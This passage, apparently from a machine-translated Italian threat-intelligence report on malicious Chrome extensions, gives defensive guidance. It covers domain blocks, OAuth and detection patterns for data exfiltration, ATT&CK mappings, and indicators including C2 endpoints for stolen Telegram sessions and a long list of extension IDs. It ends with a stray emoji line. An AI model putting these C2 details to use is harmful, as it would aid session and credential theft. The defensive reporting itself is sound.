• Se hai installato Text Translation (ogogpebnagniggbnkbpjioobomdbmdcj) e registrato con la tua e-mail, l'indirizzo e-mail e il nome vengono archiviati sul server dell'autore della minaccia.

Per le squadre di sicurezza:

• Bloccare cloudapi[.]stream e tutti i suoi sottodomini a livello di rete. L'elenco completo è nella sezione CIO di seguito.
• Bloccare top[.]rodeo.
• Contrassegna le estensioni di Chrome nel tuo ambiente che dichiarano il file identity permesso a fianco oauth2 ID cliente dai numeri di progetto Google Cloud 1096126762051 O 170835003632.
• IL loadInfo() modello (POST a /user_info all'avvio dell'operatore del servizio con l'ID estensione, aprire infoURL dalla risposta) è un'impronta digitale rilevabile. Scansiona i pacchetti di estensioni per la combinazione di user_info, infoURL, E chrome.tabs.create.
• declarativeNetRequest regole che rimuovono content-security-policy provenienti da siti di destinazione specificati non rappresentano un comportamento standard e richiedono una revisione in qualsiasi estensione.

Presa Protezione dell'estensione Chrome analizza i bundle di estensioni per rilevare flussi di dati nascosti, esfiltrazione di credenziali non divulgate e backdoor C2, bloccando le estensioni dannose prima che raggiungano gli endpoint dell'utente.

ATT&CK MITRA#

• T1176 - Estensioni del browser
• T1539 - Ruba cookie di sessione Web
• T1528 - Ruba token di accesso all'applicazione
• T1041 - Esfiltrazione sul canale C2
• T1071.001 - Protocollo del livello applicazione: protocolli Web
• T1027 - File o informazioni offuscati
• T1185 - Dirottamento della sessione del browser

Indicatori di compromesso (IOC)#

Identificatori degli attori della minaccia

Indirizzo e-mail

• kiev3381917@gmail[.]com
• formatron.service@gmail[.]com
• nashprom.info@gmail[.]com
• viktornadiezhdin@gmail[.]com
• support@top[.]rodeo
• slava.nadejdin.kiev@gmail[.]com
• nadejdinv@gmail[.]com

Nome dell'editore

• Yana Project
• GameGen
• SideGames
• Rodeo Games
• InterAlt

Credenziali del progetto

• Progetto Google Cloud: 1096126762051
• Progetto Google Cloud: 170835003632

Indicatori di rete

• cloudapi[.]stream
• tg[.]cloudapi[.]stream
• mines[.]cloudapi[.]stream
• topup[.]cloudapi[.]stream
• cdn[.]cloudapi[.]stream
• multiaccount[.]cloudapi[.]stream
• wheel[.]cloudapi[.]stream
• gamewss[.]cloudapi[.]stream
• api[.]cloudapi[.]stream
• chat[.]cloudapi[.]stream
• crm[.]cloudapi[.]stream
• top[.]rodeo
• metal[.]cloudapi[.]stream
• 144[.]126[.]135[.]238
• coin-miner[.]cloudapi[.]stream
• goldminer[.]cloudapi[.]stream
• herculessportslegend[.]cloudapi[.]stream

Endpoint C2

• tg[.]cloudapi[.]stream/save_session.php
• tg[.]cloudapi[.]stream/count_sessions.php
• tg[.]cloudapi[.]stream/get_sessions.php
• tg[.]cloudapi[.]stream/get_session.php
• tg[.]cloudapi[.]stream/delete_session.php
• tg[.]cloudapi[.]stream/save_title.php
• mines[.]cloudapi[.]stream/auth_google
• mines[.]cloudapi[.]stream/user_info
• mines[.]cloudapi[.]stream/slot_test/
• api[.]cloudapi[.]stream:8443/Register
• api[.]cloudapi[.]stream:8443/Translation
• top[.]rodeo/server/remote.php
• top[.]rodeo/server/remote3.php
• top[.]rodeo/notify.php
• cloudapi[.]stream/install/
• cloudapi[.]stream/uninstall/

ID estensione Chrome

1. obifanppcpchlehkjipahhphbcbjekfa - Multiaccount Telegram
2. mdcfennpfgkngnibjbpnpaafcjnhcjno - Client Web per Telegram - Teleside
3. mmecpiobcdbjkaijljohghhpfgngpjmk - YouSide - Barra laterale di Youtube
4. bfoofgelpmalhcmedaaeogahlmbkopfd - Client Web per Youtube - SideYou
5. cbfhnceafaenchbefokkngcbnejached - Client Web per TikTok
6. ogogpebnagniggbnkbpjioobomdbmdcj - Traduzione del testo
7. ldmnhdllijbchflpbmnlgndfnlgmkgif - Blocco pagine
8. lnajjhohknhgemncbaomjjjpmpdigedg - Aggiornamento automatico della pagina
9. aecccajigpipkpioaidignbgbeekglkd - Client Web per Rugby Rush - SideGame
10. akebbllmckjphjiojeioooidhnddnplj - Gioco di corse di Formula Rush
11. akifdnfipbeoonhoeabdicnlcdhghmpn - Premi Piggy - Slot Machine
12. akkkopcadaalekbdgpdikhdablkgjagd - Slot araba
13. alkfljfjkpiccfgbeocbbjjladigcleg - Rana fantastica
14. alllblhkgghelnejlggmmgjbkdabidie - Slot machine Barba Nera
15. amkkjdjjgiiamenbopfpdmjcleecjjgg - Indiano: slot machine
16. amnaljnjmgajgajelnplfmidgjgbjfhe - Mahjong Deluxe
17. bbjdlbemjklojnbifkgameepcafflmem - Calcio di punizione pazzesco
18. bdnanfggeppmkfhkgmpojkhanoplkacc - Corse di slot car
19. bgdkbjcdecedfoejdfgeafdodjgfohno - Cancella cache Plus
20. bnchgibgpgmlickioneccggfobljmhjc - Galactica Delux - Slot machine
21. bpljfbcejldmgeoodnogeefaihjdgbam - Test di velocità per Chrome - Test di velocità WiFi
22. cbnekafldflkmngbgmbnfmchjaelnhem - Gioco SkySpeedster
23. cdpiopekjeonfjeocbfebemgocjciepp - Maestro degli scacchi
24. cehdkmmfadpplgchnbjgdngdcjmhlfcc - Sparatoria di hockey
25. cljengcehefhflhoahaambmkknjekjib - Le probabilità degli dei - Slot machine
26. clpgopiimdjcilllcjncdkoeikkkcfbi - Biliardo professionista
27. cmeoegkmpbpcoabhlklbamfeidebgmdf - Poker a tre carte
28. cmlbghnlnbjkdgfjlegkbjmadpbmlgjb - Ciambelle - Slot Machine
29. cnibdhllkgidlgmaoanhkemjeklneolk - Arciere - Slot machine
30. cpnfioldnmhaihohppoaebillnambcgn - Corsa al rugby
31. dbohcpohlgnhgjmfkakoniiplglpfhcb - Bingo
32. dcamdpfclondppklabgkfaofjccpioil - Client Web per il gioco Cricket Batter Challenge
33. dljlpildgknddpnahppkihgodokfjbnd - Slot machine Zeus Tesori
34. dlpiookhionidajbiopmaajeckifeehn - Corse di cavalli
35. dmaibhbbpmdihedidicfeigilkbobcog - Azteco: slot machine
36. dohenclhhdfljpjlnpjnephpccbdgmmb - Dritto 4
37. dpdemambcedffmnkfmkephnhhnclmcio - Slot la pentola d'oro
38. ejlcbfmhjbkgohopdkijfgggbikgbacb - Roulette americana reale
39. eljfpgehlncincemdmmnebmnlcmfamhm - Slot Asia
40. enmmilgindjmffoljaojkcgloakmloen - Client Web per il gioco Drive Your Car
41. eoklnfefipnjfeknpmigmogeeepddcch - Giganti giurassici - Slot machine
42. fddajeklkkggbnppabbhkdmnkdjindlo - Basket di strada
43. fibgndhgobbaaekmnneapojgkcehaeac - Pannello laterale dei Tarocchi
44. fjfhejmbhpabkacpoddjbcfandjoacmb - L'uccisore di draghi: slot machine
45. flkdjodmoefccepdihipjdlianmkmhgc - Il miglior blackjack
46. fmajpchoiahphjiligpmghnhmabolhoh - Libro Di Magia - Slot Machine
47. gaafhblhbnkekenogcjniofhbicchlke - Serpente: slot machine
48. gbaoddbbpompjhmilbgiaapkkakldlpc - Dice King - Classico gioco di dadi e lanci
49. gbhhgipmedccnankkjchgcidiigmioio - Slot Ramses
50. gfhcdakcnpahfdealajmhcapnhhablbp - Guerra delle corazzate
51. gipmochingljoikdjakkdolfcbphmlom - Minatore d'oro 2
52. glofhphmolanicdaddgkmhfmjidjkaem - Corse di levrieri - Simulatore di corse di cani
53. haochenfmhglpholokliifmlpafilfdc - Ercole: leggenda dello sport
54. hbobdcfpgonejphpemijgjddanoipbkj - Calcio veloce
55. hdmppejcahhppjhkncagagopecddokpi - Magia Voodoo: slot machine
56. heljkmdknlfhiecpknceodpbokeipigo - Client Web per sparatorie di hockey - SideGame
57. hiofkndodabpioiheinoiojjobadpgmj - MAESTRO DAMA
58. hkbihmjhjmehlocilifheeaeiljabenb - Corsa alle moto d'acqua
59. hlmdnedepbbihmbddepemmbkenbnoegd - Corsa in auto
60. hmlnefhgicedcmebmkjdcogieefbaagl - Videopoker Deuces Wild
61. hnpbijogiiaegambgpaenjbcbgaeimlf - Slot machine Ultimate Soccer
62. ibelidmkbnjmmpjgfibbdbkamgcbnjdm - Vigilia di Natale: slot machine
63. ihbkmfoadnfjgkpdmgcboiehapkiflme - Viaggio a Columbus: slot machine
64. ijccacgjefefdpglhclnbpfjlcbagafm - Gioco da casinò alto o basso
65. ijfmkphjcogaealhjgijjfjlkpdhhojk - Sfida tra portieri
66. ijpgccpmogehkjhdmomckpkfcpbjlmnj - Spiaggia tropicale - Slot machine
67. imjmnghlhiimodfkdkgnfplhlobehnpm - Black Jack 3D
68. jddinhnhplibccfmniaakhffpjpnaglp - Client Web per il gioco Classic Bowling
69. jmopjanoebpdbopigcbpjhiigmjolikk - Miniere di Zeus infuriate
70. jnmmbmkmbkcccpihjgnhjmhhkokfdnfe - Backgammon classico
71. jodocbbdcdclkhjkibnlfhbmllcpfkfo - Slot Machine I Frutti
72. kahcolfecjbejjjadhjafmihdnifonjf - Baccarà
73. kblomapfkjidbbbdllmofkcakcenkmec - Il mondo del minigolf
74. kbmindomjiejdikjaagfdbdfpnlanobi - Corsa all'oro - Slot machine
75. kbnkkecifeppobnemkielnpagifkobki - Slot Pirata
76. kjnakdbpijigdbfepipnbafnhbcfdkga - 40 Corona Imperiale - Slot Machine
77. kknakidneabpfgepadgpkibalcnabnnh - 3Slot machine D Calcio
78. klglejfbdeipgklgaepnodpjcnhaihkd - Corse di cavalli premium
79. kmiidcaojgeepjlccoalkdimgpfnbagj - Gioco dei carri armati
80. lcijkepobdokkgmefebkiejhealgblle - Poker caraibico
81. lefndgfmmbdklidbkeifpgclmpnhcilg - Bufalo selvaggio - Slot machine
82. lfkknbmaifjomagejflmjklcmpadmmdg - Acqua - Slot machine
83. ljbgkfbiifhpgpipepnfefijldolkhlm - Gioco Fusione crittografica
84. lmcpbhamfpbonaenickjclacodolkbdl - Foresta di Sherwood - Slot machine
85. lmgenhmehbcolpikplhkoelmagdhoojn - Client Web per il gioco Fatboy Dream
86. maeccdadgnadblfddcmanhpofobhgfme - Jackpot Lone Star - Slot machine
87. medkneifmjcpgmmibfppjpfjbkgbgebl - Gioco del gattino nascosto
88. mheomooihiffmcgldolenemmplpgoahn - Keno
89. mmbbjakjlpmndjlbhihlddgcdppblpka - Jokers Bonanza - Slot machine
90. mmbkmjmlnhocfcnjmbchmflamalekbnb - Calci di rigore
91. nbgligggjfgkpphhghhjdoiefbimgooc - Poker Pai Gow
92. ncpdkpcgmdhhnmcjgiiifdhefmekdcnf - Calcolatore di metalli
93. ndajcmifndknmkckdcdefkpgcodciggk - Fattoria - Slot machine
94. nelbpdjegmhhgpfcjclhdmkcglimkjpp - Puzzle del labirinto ferroviario
95. nkacmelgoeejhjgmmgflbcdhonpaplcg - GIOCO DI CARTE CANE ROSSO
96. nmegibgeklckejdlfhoadhhbgcdjnojb - Minatore di monete 2
97. nodobilhjanebkafmpihkpoabiggnnfl - Ninja Nero - Slot machine
98. oanpifaoclmgmflmddlgkikfaggejobn - Solitario Piramide
99. ocflhkadmmnlbieoiiekfcdcmjcfeahe - Client Chrome per sci alpino - SideGame
100. odeccdcabdffpebnfancpkepjeecempn - Slot machine Signor Pollo
101. oejhnncfanbaogjlbknmlgjpleachclf - Client Web per la roulette francese - SideGame
102. ogbaedmbbmmipljceodeimlckohbnfan - 3Gioco del casinò D Roulette
103. ojkbafekojdcedacileemekjdfdpkbkf - Avventura spaziale con slot machine
104. pdgaknahllnfldmclpcllpieafkaibmf - Colpiscili tutti
105. peflgkmfmoijonfgcjdlpnnfdegnlaji - Videopoker Jacks or Better
106. phfkdailnomcbcknpdmokejhellbecjb - Nuoto professionista
107. pkghgkfjhjghinikeanecbgjehojfhdg - InterAlt
108. pllkanemicadpcmkfodglahcocfdgkhj - Oro d'Egitto - Slot Machine
109. 😂😂🤑😈